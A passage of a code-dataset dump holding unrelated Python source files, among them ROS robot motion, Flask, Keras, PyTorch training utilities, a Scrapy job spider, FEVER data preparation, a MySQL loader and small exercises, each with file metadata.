group.set_goal_tolerance(0.01)\n group.set_goal_joint_tolerance(0.01)\n group.set_planning_time(1e3)\n\n p = geometry_msgs.msg.PoseStamped()\n\n # add_table_scene(robot, 
scene)\n pose_cubes = find_cube(models, model_coordinates, robot, scene)\n pose_bucket = find_bucket(models, model_coordinates, robot, scene)\n\n # motion commands for a single cube-pickup and dropoff\n # should repeat for cube in pose_cubes\n pose_goal = group.get_current_pose().pose\n pose_goal.orientation = geometry_msgs.msg.Quaternion(\n *tf_conversions.transformations.quaternion_from_euler(\n 0.0, -math.pi / 2, -math.pi / 4\n )\n )\n\n gripper_open()\n for cube in pose_cubes:\n # goto cube\n rospy.loginfo(\"Going to cube...\")\n pose_goal.position = copy.deepcopy(cube.pose.position)\n move_path(\n group,\n pose_goal,\n display_trajectory_publisher,\n vert_approach=True,\n vert_offset=0.5,\n )\n # goto bucket\n rospy.loginfo(\"Going to bucket...\")\n pose_goal.position = copy.deepcopy(pose_bucket.position)\n move_path(\n group,\n pose_goal,\n display_trajectory_publisher,\n vert_approach=False,\n vert_offset=0.5,\n )\n\n","sub_path":"catkin_ws_project_1/src/proj1/scripts/move_cubes_to_bucket.py","file_name":"move_cubes_to_bucket.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584099277","text":"#!/usr/bin/env python\n\nimport os\nimport datetime\n\nfrom flask import Blueprint, request, render_template\nfrom flask_application import app\n\nfrontend = Blueprint('frontend', __name__)\n\n\n@frontend.route('/')\ndef index():\n if app.debug:\n app.logger.debug('rendering index')\n\n # Get ember templates\n template_dir = 'flask_application/templates/ember'\n templates = [os.path.join('ember', t) for t in os.listdir(template_dir)]\n\n return render_template(\n 'index.html',\n config=app.config,\n templates=templates\n )\n\n","sub_path":"flask_application/controllers/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"285834167","text":"import math\n\ndef sumDivisors(x):\n\tdivs = []\n\t\n\tfor i in range(1, int(math.floor(x**.5))):\n\t\tif x % i == 0:\n\t\t\tdivs.append(i)\n\t\t\t\n\t\t\tif x / i != i and x != i:\n\t\t\t\tdivs.append(x/i)\n\t\n\tlambdaSum = lambda x,y: x+y\n\treturn reduce( lambdaSum, divs)\n\namicables = []\ndivSums = []\nfor i in range(4, 10000):\n\tdivSum = sumDivisors(i)\n\tif divSum in divSums:\n\t\tamicables.append(i)\n\t\tamicable = divSums.index(divSum)\n\t\tif not amicable in amicables:\n\t\t\tamicables.append(amicable)\n\n\tdivSums.append(divSum)\n\nlambdaSum = lambda x,y: x+y\nprint(amicables)\nprint(reduce( lambdaSum, amicables ) )\n","sub_path":"python/21eu.py","file_name":"21eu.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586071793","text":"import tensorflow as tf\nfrom keras import layers\nfrom keras.utils.generic_utils import register_keras_serializable\nfrom keras.utils.tf_utils import shape_type_conversion\n\n\n@register_keras_serializable(package='SegMe')\nclass ResizeByScale(layers.Layer):\n def __init__(self, scale, method=tf.image.ResizeMethod.BILINEAR, antialias=False, **kwargs):\n kwargs['autocast'] = False\n super().__init__(**kwargs)\n self.input_spec = layers.InputSpec(ndim=4)\n self.scale = float(scale)\n self.method = method\n self.antialias = antialias\n\n def _scale(self, value):\n return None if value is None else int(round(value * self.scale))\n\n def call(self, inputs, **kwargs):\n if 1 == self.scale:\n return 
inputs\n\n new_size = tf.cast(tf.round(tf.cast(tf.shape(inputs)[1:3], self.compute_dtype) * self.scale), 'int32')\n resized = tf.image.resize(inputs, new_size, method=self.method, antialias=self.antialias)\n\n inputs_dtype = tf.dtypes.as_dtype(inputs.dtype)\n if inputs_dtype.is_integer:\n resized = tf.round(resized)\n resized = tf.cast(resized, inputs.dtype)\n\n new_shape = inputs.shape[0], self._scale(inputs.shape[1]), self._scale(inputs.shape[2]), inputs.shape[3]\n resized.set_shape(new_shape)\n\n return resized\n\n @shape_type_conversion\n def compute_output_shape(self, input_shape):\n if 1 == self.scale:\n return input_shape\n\n return input_shape[0], self._scale(input_shape[1]), self._scale(input_shape[2]), input_shape[3]\n\n def compute_output_signature(self, input_signature):\n output_signature = super().compute_output_signature(input_signature)\n\n return tf.TensorSpec(dtype=input_signature.dtype, shape=output_signature.shape)\n\n def get_config(self):\n config = super().get_config()\n config.update({\n 'scale': self.scale,\n 'method': self.method,\n 'antialias': self.antialias\n })\n\n return config\n\n\ndef resize_by_scale(inputs, **kwargs):\n return ResizeByScale(**kwargs)(inputs)\n","sub_path":"segme/common/resizebyscale.py","file_name":"resizebyscale.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"188280665","text":"import os\nimport pickle\nimport numpy as np\nimport sys\nimport math\nfrom torch.autograd import Variable\nimport torch\n\n\ndef file_cache_name(file):\n head, tail = os.path.split(file)\n filename, ext = os.path.splitext(tail)\n return os.path.join(head, filename + \".p\")\n\n\ndef write_cache_word_vectors(file, data):\n with open(file_cache_name(file), 'wb') as pickle_file:\n pickle.dump(data, pickle_file)\n\n\ndef load_cache_word_vectors(file):\n with open(file_cache_name(file), 'rb') as f:\n return pickle.load(f)\n\ndef label_mapping(y):\n y_np = np.array(y)\n un_labels = np.unique(y_np)\n lab2idx = {}\n idx2lab = {}\n for idx, lab in enumerate(un_labels):\n lab2idx[lab] = idx\n idx2lab[idx] = lab\n return lab2idx, idx2lab\n\n\ndef progress(loss, epoch, batch, batch_size, dataset_size):\n batches = math.ceil(float(dataset_size) / batch_size)\n count = batch * batch_size\n bar_len = 40\n filled_len = int(round(bar_len * count / float(dataset_size)))\n\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n status = 'Epoch {}, Loss: {:.4f}'.format(epoch, loss)\n _progress_str = \"\\r \\r [{}] ...{}\".format(bar, status)\n sys.stdout.write(_progress_str)\n sys.stdout.flush()\n\n if batch == batches:\n print()\n\n\ndef train_epoch(epoch, data_loader, model, loss_function, optimizer,\n batch_size, train_set):\n\n model.train()\n\n ## training epoch\n total_loss = 0.0\n print('epoch', epoch)\n for iteration, batch in enumerate(data_loader, 1):\n samples, labels, lengths = batch\n samples = Variable(samples)\n labels = Variable(labels)\n lengths = Variable(lengths)\n\n # if torch.cuda.is_available():\n # samples = samples.cuda(1)\n # labels = labels.cuda(1)\n # lengths = lengths.cuda(1)\n\n # 1 - zero the gradients\n optimizer.zero_grad()\n\n # 2 - forward pass\n output = model(samples, lengths)\n\n # 3 - compute loss\n _loss = loss_function(output, labels)\n\n # 4 - backward pass\n _loss.backward()\n\n # 5 - optimizer step\n optimizer.step()\n\n total_loss += _loss.data[0]\n\n # print statistics\n progress(loss=_loss.data[0],\n epoch=epoch,\n batch=iteration,\n 
batch_size=batch_size,\n dataset_size=len(train_set))\n\n _avg_loss = total_loss / iteration\n\n return _avg_loss\n\n\ndef test_epoch(epoch, data_loader, model, loss_function):\n\n model.eval()\n y_pred = []\n y = []\n\n total_loss = 0\n print('epoch', epoch)\n for iteration, batch in enumerate(data_loader, 1):\n samples, labels, lengths = batch\n samples = Variable(samples, volatile=True)\n labels = Variable(labels, volatile=True)\n lengths = Variable(lengths, volatile=True)\n\n if torch.cuda.is_available():\n samples = samples.cuda(1)\n labels = labels.cuda(1)\n lengths = lengths.cuda(1)\n\n # 1 - zero the gradients\n # optimizer.zero_grad()\n\n # 2 - forward pass\n output = model(samples, lengths)\n\n # 3 - compute loss\n _loss = loss_function(output, labels)\n\n # 4 - backward pass\n # loss.backward()\n\n # 5 - optimizer step\n # optimizer.step()\n\n total_loss += _loss.data[0]\n\n _, predicted = torch.max(output.data, 1)\n y.extend(list(labels.data.cpu().numpy().squeeze()))\n y_pred.extend(list(predicted.squeeze()))\n\n _avg_loss = total_loss / iteration\n\n return _avg_loss, y, y_pred\n","sub_path":"utils/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617976776","text":"import torch\nimport torch.nn as nn\n\nfrom maskrcnn_benchmark.config import cfg\nfrom predictor import COCODemo\n\nclass FasterRcnnVisionModel (nn.Module):\n\n def __init__ (self):\n super(FasterRcnnVisionModel, self).__init__()\n\n config_file = '/home/jl25/research/maskrcnn-benchmark/configs/caffe2/e2e_faster_rcnn_R_101_FPN_1x_caffe2.yaml'\n cfg.merge_from_file(config_file)\n self.coco_demo = COCODemo(cfg)\n\n def forward (self, image):\n '''\n > image cv2image\n < bboxes [[float * 4] * n_regions=1000]\n < regions_visual_feats [(d_region_visual_feats=1024) * n_regions=1000]\n < objectnesses [float * n_regions=1000]\n < image_feats (1, d_image_feats)\n '''\n\n bbox_feats, bboxes_reg, objectness = self.coco_demo.compute_prediction(image)\n bboxes = bboxes_reg.bbox.tolist()[:-1]\n bboxes_feats = list(bbox_feats.cpu().chunk(bbox_feats.size(0), dim=0))\n regions_visual_feats = bboxes_feats[:-1]\n image_feats = bbox_feats[-1,:].unsqueeze(0).cpu().clone().detach()\n objectnesses = objectness.tolist()\n return bboxes, regions_visual_feats, objectnesses, image_feats\n","sub_path":"demo/FasterRcnnVisionModel.py","file_name":"FasterRcnnVisionModel.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"373896619","text":"#We used the following libraries:\n\n#numpy: This library used for dealing with numeric values and all the functions which using these values.\n#collections: This library used for getting the default dictionary.\n\n#We also used the \"ResumeHelper\" and \"ResumeSegmenter\" classes that we have created.\n\nimport numpy as np\nfrom collections import defaultdict\n\nimport ResumeHelper\nimport ResumeSegmenter\n\n#This function takes 4 parameters.\n#First parameter is which contains a group of sentences with their font size and type.\n#Second parameter is paragraph number.\n#Third parameter is the previous sentences feature extraction of this sentence which contains a list of features dictionaries.\n#Fourth parameter is the previous sentences segmentation values.\n#Returns a dictionary of features, where the key represents the feature name.\ndef 
sentenceFeaturesExtraction(sentences_info, paragraph_num, prev_x_result, prev_y_result):\n Contain_email = False\n Contain_Phone = False\n Contain_URL = False\n Contain_Date = False\n IsExperienceSegment = False\n IsSkillSegment = False\n IsEducationSegment = False\n IsProjectSegment = False\n Font_Size = defaultdict(int)\n Font_Family = defaultdict(int)\n Word_Count = 0\n\n if paragraph_num == 0:\n prevtag = \"\"\n pre_Font_Size = 0\n pre_Font_Family = \"\"\n else:\n prevtag = prev_y_result[-1]\n pre_Font_Size = prev_x_result[-1][\"Font_Size\"]\n pre_Font_Family = prev_x_result[-1][\"Font_Family\"]\n\n for sent_info in sentences_info:\n for sub_sent in sent_info[0]:\n if ResumeHelper.getUrl(sub_sent) != None:\n Contain_URL = True\n\n if ResumeHelper.getEmail(sub_sent) != None:\n Contain_email = True\n\n if ResumeHelper.getDate(sub_sent.lower()) != None:\n Contain_Date = True\n\n if ResumeHelper.getNumber(sub_sent) != None:\n Contain_Phone = True\n\n for word in ResumeSegmenter.work_experience_segment:\n if sub_sent.lower().__contains__(word.lower()):\n IsExperienceSegment = True\n\n for word in ResumeSegmenter.skill_segment:\n if sub_sent.lower().__contains__(word.lower()):\n IsSkillSegment = True\n\n for word in ResumeSegmenter.education_segment:\n if sub_sent.lower().__contains__(word.lower()):\n IsEducationSegment = True\n\n for word in ResumeSegmenter.project_segment:\n if sub_sent.lower().__contains__(word.lower()):\n IsProjectSegment = True\n\n Word_Count += len(sub_sent.split(' '))\n for word in sub_sent.split():\n Font_Size[sent_info[1]] += 1\n Font_Family[sent_info[2]] += 1\n\n most_iterate_size_value = 0\n most_iterate_size = 0\n\n for size in Font_Size:\n if(most_iterate_size_value'):\n Normalized_Feat.append(-1)\n else:\n class_is = feat['prevtag']\n itemindex = np.where(segmnetation_values == class_is)\n Normalized_Feat.append(itemindex[0][0])\n\n copyof_x_data.append(Normalized_Feat.copy())\n return copyof_x_data\n\ndef prepareDataForTraining(data):\n x_data = []\n y_data = []\n for resume in data:\n for pharagraph_num in data[resume]:\n x_data.append(sentenceFeaturesExtraction(data[resume][pharagraph_num][0:-1], pharagraph_num, x_data, y_data))\n y_data.append(data[resume][pharagraph_num][-1])\n X = numericDataX(x_data, y_data)\n Y = numericDataY(y_data)\n return X,Y\n\n","sub_path":"src/SegementerClassifier.py","file_name":"SegementerClassifier.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80069331","text":"\"\"\"This file is a TMP spider created on top of the ATSSpider\nscrapy crawl tmp_nonsearch -a mining_job_id=9999 -a iteration=1 -a url=\"http://jobs.asmnet.com/\" -a extract=1\n\nsample url:\n http://jobs.asmnet.com/\n http://wellstarjobs.org/\n http://jobs.kfc.com/\n http://concentra.tbjobsearch.com/\n http://searchskyjobs.com/\n http://jobs.bd.com/\n\"\"\"\nfrom urlparse import urljoin\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.spiders.tmp import TMP\n\n\nclass TMP_NONSEARCH(TMP):\n\n name = \"tmp_nonsearch\"\n\n # Added a blocked domain to the list of allowed_domains\n allowed_domains = [\"jobsatnovanthealth.org\"]\n jobs_seen = set()\n\n def parse(self, response):\n sel = Selector(response)\n\n for cat in sel.xpath('//ul[@name=\"locations_list_link\"]/li/a/@href').extract():\n yield Request(\n url=urljoin(response.url, cat),\n callback=self.parse_page,\n meta={'locationurl': cat.replace('/', '')}\n )\n\n def 
parse_page(self, response):\n self.set_meta_language(response)\n sel = Selector(response)\n jobs = sel.xpath('//table[@class=\"info-table\"]//tr[descendant::a[not(contains(@href,\"jobs/job-list\"))]][not(descendant::input)]')\n next_page = sel.xpath(\"//a[@id='jobs_next_page_link']/@href\")\n\n currentpage = response.meta.get('currentpage', 1)\n\n yielded_job = False\n\n for job in jobs:\n if not job.xpath('.//a[not(contains(@href, \"javascript\"))]/@href'):\n continue\n url = urljoin(response.url, job.xpath(\".//a/@href\").extract()[0])\n location = ''.join(job.xpath(\"td[2]/text()\").extract())\n request = Request(url, callback=self.parse_job_callback())\n request.meta['locationurl'] = response.meta['locationurl']\n request.meta['location'] = location\n request.meta['title'] = job.xpath(\".//a/text()\").extract()[0]\n yielded_job = True\n yield request\n\n if next_page and yielded_job:\n url = urljoin(response.url, '/%s/job-list-%s' % (response.meta['locationurl'], currentpage+1))\n yield Request(\n url=url,\n callback=self.parse_page,\n meta={'currentpage': currentpage+1, 'locationurl': response.meta['locationurl']}\n )\n\n def parse_job(self, response):\n sel = Selector(response)\n\n if sel.xpath('//table[@class=\"info-table\"]'):\n for request in self.parse_page(response):\n request.meta['locationurl'] = response.meta['locationurl']\n yield request\n else:\n items = super(TMP_NONSEARCH, self).parse_job(response)\n for item in items:\n if item['referencenumber'] not in self.jobs_seen:\n self.jobs_seen.add(item['referencenumber'])\n yield item\n","sub_path":"brightcorp/brightcorp/spiders/tmp_nonsearch.py","file_name":"tmp_nonsearch.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"86631690","text":"#\n# Pyserini: Python interface to the Anserini IR toolkit built on Lucene\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport json\nimport os\nimport argparse\n\ndef generate_queries_and_qrels(args):\n queries = {}\n with open(args.dataset_file, 'r', encoding='utf-8') as f_in:\n # open qrels file if provided\n if args.output_qrels_file:\n print('Generating qrels...')\n qrels_out = open(args.output_qrels_file, 'w', encoding='utf-8')\n\n # open labels file if provided\n if args.output_labels_file:\n print('Generating labels...')\n labels_out = open(args.output_labels_file, 'w', encoding='utf-8')\n\n for line in f_in:\n line_json = json.loads(line.strip())\n qid = line_json['id']\n query = line_json['claim']\n if 'label' in line_json: # no \"label\" field in test datasets\n label = line_json['label']\n\n # save query to queries dict\n queries[qid] = query\n if label == 'NOT ENOUGH INFO':\n continue\n\n # write claims and evidence to qrels file if provided\n if args.output_qrels_file:\n # dedupe evidences for the query\n evidences = set()\n for annotator in line_json['evidence']:\n for evidence in annotator:\n if args.granularity == 'sentence':\n evidences.add((evidence[2], 
evidence[3]))\n else: # args.granularity == 'paragraph'\n evidences.add(evidence[2])\n\n # write deduped evidences to qrels file\n if args.granularity == 'sentence':\n for doc_id, sentence_id in evidences:\n qrels_out.write(f'{qid}\\t0\\t{doc_id}_{sentence_id}\\t2\\n')\n else: # args.granularity == 'paragraph'\n for doc_id in evidences:\n qrels_out.write(f'{qid}\\t0\\t{doc_id}\\t2\\n')\n\n # write claims and labels to labels file if provided\n if args.output_labels_file:\n score = 1 if label == 'SUPPORTS' else 0\n labels_out.write(f'{qid}\\t{score}\\n')\n\n # close qrels file if provided\n if args.output_qrels_file:\n qrels_out.close()\n\n # close labels file if provided\n if args.output_labels_file:\n labels_out.close()\n\n # write queries to queries file if provided\n if args.output_queries_file:\n print('Generating queries...')\n with open(args.output_queries_file, 'w', encoding='utf-8') as f_out:\n for qid, query in queries.items():\n f_out.write(f'{qid}\\t{query}\\n')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Generates queries and qrels files from a FEVER dataset file.')\n parser.add_argument('--dataset_file', required=True, help='Path to FEVER dataset file.')\n parser.add_argument('--output_queries_file', help='Output queries file.')\n parser.add_argument('--output_qrels_file', help='Output qrels file.')\n parser.add_argument('--output_labels_file', help='Output labels file.')\n parser.add_argument('--granularity',\n required=True,\n choices=['paragraph', 'sentence'],\n help='The granularity of the source documents to index. Either \"paragraph\" or \"sentence\".')\n args = parser.parse_args()\n\n if not args.output_queries_file and not args.output_qrels_file:\n print('Please provide at least one of --output_queries_file or --output_qrels_file.')\n exit()\n\n if args.output_queries_file and not os.path.exists(os.path.dirname(args.output_queries_file)):\n os.makedirs(os.path.dirname(args.output_queries_file))\n if args.output_qrels_file and not os.path.exists(os.path.dirname(args.output_qrels_file)):\n os.makedirs(os.path.dirname(args.output_qrels_file))\n\n generate_queries_and_qrels(args)\n\n print('Done!')\n","sub_path":"src/main/python/fever/generate_queries_and_qrels.py","file_name":"generate_queries_and_qrels.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311624095","text":"import mysql.connector\nimport platform,os,sys\n\n\nwin= 'win' in platform.system().lower()\n\ndtfile=\"\"\ndivDir=\"\"\nscriptDir=os.path.dirname(sys.argv[0])\nif win:\n dtfile='c:/code/bizd.txt'\n divDir=os.path.dirname(sys.argv[0])+\"/div\"\nelse:\n dtfile='bizd.txt'\n divDir='/home/NSJ/data/ind'\n# mysql1.py\nconfig = {\n 'host': '10.189.66.33',\n 'user': 'wdy',\n 'password': '123456',\n 'port': 3306,\n 'database': 'NSJ',\n 'charset': 'utf8'\n}\nconn = mysql.connector.connect(**config)\ncursor = conn.cursor()\n\n\n\ndata=list()\nwith open(f\"{scriptDir}/beta.csv\",\"r\",encoding=\"utf-8\") as f:\n for i in f.readlines():\n i=i.strip()\n print(i)\n xx=i.split(',')\n\n xx[0]=int(xx[0])\n xx[5]=int(xx[5])\n xx[6]=int(xx[6])\n xx[4]=float(xx[4])\n data.append(tuple(xx))\n\n#today,cls,ind,sym,result[cls][ind][sym]]\nsql = \"insert into industryBeta (dataDate,classify,industry,symbol,beta,betaRank,betaCount) values (%s,%s,%s,%s,%s,%s,%s)\"\n#cursor.execute(sql,data[0])\ntry:\n cursor.executemany(sql,tuple(data))\nexcept Exception as e:\n print(\"Error executing MySQL statement %s: %s\" % (sql,
e))\n\nconn.commit()\ncursor.close()\nconn.close()\n","sub_path":"ind/test_gs.py","file_name":"test_gs.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596267225","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('portfolio', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=250)),\n ('slug', models.SlugField(unique=True, max_length=255)),\n ('project_url', models.URLField(verbose_name=b'Project_URL')),\n ('description', models.TextField(blank=True)),\n ('disciplines', models.CharField(max_length=250)),\n ('completion_date', models.DateField()),\n ('in_development', models.BooleanField(default=False)),\n ('is_public', models.BooleanField(default=True)),\n ('overview_image', models.URLField()),\n ('detail_image', models.URLField()),\n ('client', models.ForeignKey(to='portfolio.Client')),\n ('media', models.ManyToManyField(to='portfolio.Media')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='projects',\n name='client',\n ),\n migrations.RemoveField(\n model_name='projects',\n name='media',\n ),\n migrations.DeleteModel(\n name='Projects',\n ),\n ]\n","sub_path":"portfolio/migrations/0002_auto_20141126_1928.py","file_name":"0002_auto_20141126_1928.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415823060","text":"from kivy.app import App\nfrom kivy.uix.label import Label\n\n\nclass TestApp(App):\n def build(self):\n root_widget = Label(text=\"It is fun to program\", font_size=80)\n root_widget.bind(on_touch_down=self.change)\n return root_widget\n\n def change(self, instance, touch):\n if instance.text == \"Programming is fun\":\n instance.text = \"It is fun to program\"\n else:\n instance.text = \"Programming is fun\"\n\n\nmy_app = TestApp()\nmy_app.run()\n","sub_path":"SUTD_DW/11_week/cohort_1.py","file_name":"cohort_1.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260949843","text":"\"\"\"Main entry point for the MERlin pipeline.\"\"\"\nimport argparse\nimport json\nimport sys\nfrom pathlib import Path\nfrom typing import TextIO\n\nimport snakemake\n\nimport merlin\nfrom merlin.core import executor\nfrom merlin.core.dataset import MERFISHDataSet\nfrom merlin.util import snakewriter\n\n\ndef build_parser() -> argparse.ArgumentParser:\n \"\"\"Create the command-line argument parser.\"\"\"\n parser = argparse.ArgumentParser(description=\"Decode MERFISH data.\")\n\n parser.add_argument(\n \"--generate-only\",\n action=\"store_true\",\n help=\"only generate the directory structure and do not run any analysis.\",\n )\n parser.add_argument(\n \"--configure\",\n action=\"store_true\",\n help=\"configure MERlin environment by specifying data, analysis, and parameters directories.\",\n )\n parser.add_argument(\"dataset\", help=\"directory where the raw data is stored\")\n parser.add_argument(\"-a\", \"--analysis-parameters\", help=\"name of the analysis parameters file to use\")\n parser.add_argument(\"-o\", \"--data-organization\", 
help=\"name of the data organization file to use\")\n parser.add_argument(\"-c\", \"--codebook\", nargs=\"+\", help=\"name of the codebook to use\")\n parser.add_argument(\"-m\", \"--microscope-parameters\", help=\"name of the microscope parameters to use\")\n parser.add_argument(\"-p\", \"--positions\", help=\"name of the position file to use\")\n parser.add_argument(\"-n\", \"--core-count\", type=int, help=\"number of cores to use for the analysis\")\n parser.add_argument(\"--check-done\", action=\"store_true\", help=\"flag to only check if the analysis task is done\")\n parser.add_argument(\n \"-t\",\n \"--analysis-task\",\n help=\"the name of the analysis task to execute. If no analysis task is provided, all tasks are executed.\",\n )\n parser.add_argument(\n \"-i\", \"--fragment-index\", default=\"\", help=\"the index of the fragment of the analysis task to execute\"\n )\n parser.add_argument(\"-e\", \"--data-home\", help=\"the data home directory\")\n parser.add_argument(\"-s\", \"--analysis-home\", help=\"the analysis home directory\")\n parser.add_argument(\"-k\", \"--snakemake-parameters\", help=\"the name of the snakemake parameters file\")\n parser.add_argument(\"-f\", \"--fovs\", help=\"filename containing list of FOVs to process\")\n parser.add_argument(\"--skip\", nargs=\"+\", help=\"list of FOV names to omit from processing\")\n parser.add_argument(\"--profile\", action=\"store_true\", help=\"profile tasks and dump to logs\")\n parser.add_argument(\"--suffix\", help=\"Suffix to add to the analysis output directory name\")\n\n return parser\n\n\ndef clean_string_arg(string: str) -> str | None:\n \"\"\"Remove any single or double quotes around string.\"\"\"\n return None if string is None else string.strip(\"'\").strip('\"')\n\n\ndef get_optional_path(string: str) -> Path | None:\n string = clean_string_arg(string)\n return Path(string) if string is not None else None\n\n\ndef get_input_path(prompt: str) -> str:\n \"\"\"Ask user to provide a directory.\"\"\"\n while True:\n path = str(input(prompt))\n if not path.startswith(\"s3://\") and not Path(path).expanduser().exists():\n print(f\"Directory {path} does not exist. 
Please enter a valid path.\")\n else:\n return path\n\n\ndef configure_environment() -> None:\n \"\"\"Create the merlin environment file by prompting the user.\"\"\"\n data_home = get_input_path(\"DATA_HOME=\")\n analysis_home = get_input_path(\"ANALYSIS_HOME=\")\n parameters_home = get_input_path(\"PARAMETERS_HOME=\")\n merlin.store_env(data_home, analysis_home, parameters_home)\n\n\ndef run_merlin() -> None:\n \"\"\"Run the MERlin pipeline.\"\"\"\n parser = build_parser()\n args, _ = parser.parse_known_args()\n\n if not args.analysis_task:\n print(\"MERlin - the MERFISH decoding pipeline\")\n\n if args.configure:\n print(\"Configuring MERlin environment\")\n configure_environment()\n return\n\n dataset = MERFISHDataSet(\n args.dataset,\n dataOrganizationName=get_optional_path(args.data_organization),\n codebookNames=args.codebook,\n microscopeParametersName=get_optional_path(args.microscope_parameters),\n positionFileName=get_optional_path(args.positions),\n dataHome=get_optional_path(args.data_home),\n analysisHome=get_optional_path(args.analysis_home),\n fovList=get_optional_path(args.fovs),\n profile=args.profile,\n skip=args.skip,\n analysis_suffix=args.suffix\n )\n\n parameters_home = merlin.ANALYSIS_PARAMETERS_HOME\n # e = executor.LocalExecutor(coreCount=args.core_count)\n snakefile_path = None\n if args.analysis_parameters:\n # This is run in all cases that analysis parameters are provided\n # so that new analysis tasks are generated to match the new parameters\n with Path(parameters_home, args.analysis_parameters).open() as f:\n snakefile_path = generate_analysis_tasks_and_snakefile(dataset, f)\n\n if not args.generate_only:\n if args.analysis_task:\n task = dataset.load_analysis_task(args.analysis_task, args.fragment_index)\n if args.check_done:\n # checking completion creates the .done file for parallel tasks\n # where completion has not yet been checked\n if task.is_complete():\n print(f\"Task {args.analysis_task} is complete\")\n else:\n print(f\"Task {args.analysis_task} is not complete\")\n else:\n task.run()\n elif snakefile_path:\n snakemake_parameters = {}\n if args.snakemake_parameters:\n with Path(merlin.SNAKEMAKE_PARAMETERS_HOME, args.snakemake_parameters).open() as f:\n snakemake_parameters = json.load(f)\n\n run_with_snakemake(dataset, snakefile_path, args.core_count, snakemake_parameters)\n\n\ndef generate_analysis_tasks_and_snakefile(dataset: MERFISHDataSet, parameters_file: TextIO) -> str:\n \"\"\"Create the snakemake workflow file for the given dataset and parameters.\"\"\"\n print(f\"Generating analysis tasks from {parameters_file.name}\")\n analysis_parameters = json.load(parameters_file)\n generator = snakewriter.SnakefileGenerator(analysis_parameters, dataset, sys.executable)\n snakefile_path = generator.generate_workflow()\n print(f\"Snakefile generated at {snakefile_path}\")\n return snakefile_path\n\n\ndef run_with_snakemake(dataset: MERFISHDataSet, snakefile_path: Path, cores: int, snakefile_parameters: dict) -> None:\n \"\"\"Run the snakemake workflow.\"\"\"\n print(\"Running MERlin pipeline through snakemake\")\n snakemake.snakemake(\n snakefile_path,\n cores=cores,\n workdir=dataset.get_snakemake_path(),\n stats=snakefile_path.with_suffix(\".stats\"),\n lock=False,\n keepgoing=True,\n **snakefile_parameters,\n )\n","sub_path":"merlin/merlin.py","file_name":"merlin.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"485214167","text":"import math\n\n### 
Returns a list of numbers that contains the \n### prime factors of a given number\ndef primeFactors(n):\n prime_factors = []\n\n # divide all the 2's out first\n while n % 2 == 0:\n prime_factors.append(2)\n n = n / 2\n\n # now n is odd, so we iterate from 3 in steps of 2\n # and find all the odd numbers up to sqrt(n)\n # that evenly divide n\n for i in range(3, int(math.sqrt(n)) + 1, 2):\n while n % i == 0:\n prime_factors.append(int(i))\n n = n / i\n\n # at the end, if n is a prime and greater than 2\n # add n into the list\n if n > 2:\n prime_factors.append(int(n))\n\n return prime_factors\n\nn = int(input())\nprint(primeFactors(n))","sub_path":"algorithms/primeFactors.py","file_name":"primeFactors.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"593191364","text":"import numpy as np\nimport pickle\nfrom tqdm import tqdm\nfrom features import Features\nfrom model_train import Model_Train\nimport yaml\nfrom sklearn.svm.classes import SVC\nfrom sklearn.model_selection import ParameterGrid\nimport sys\nfrom sklearn.metrics.pairwise import laplacian_kernel, chi2_kernel\n\nfeature_types = ['l_surf', 'l_cnn', 'l_asr', 'l_mfcc', 'l_soundnet']\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print (\"Usage: {0} config_file\".format(sys.argv[0]))\n print (\"config_file -- yaml filepath containing all parameters\")\n exit(1)\n config_file = sys.argv[1]\n my_params = yaml.load(open(config_file))\n train_list = 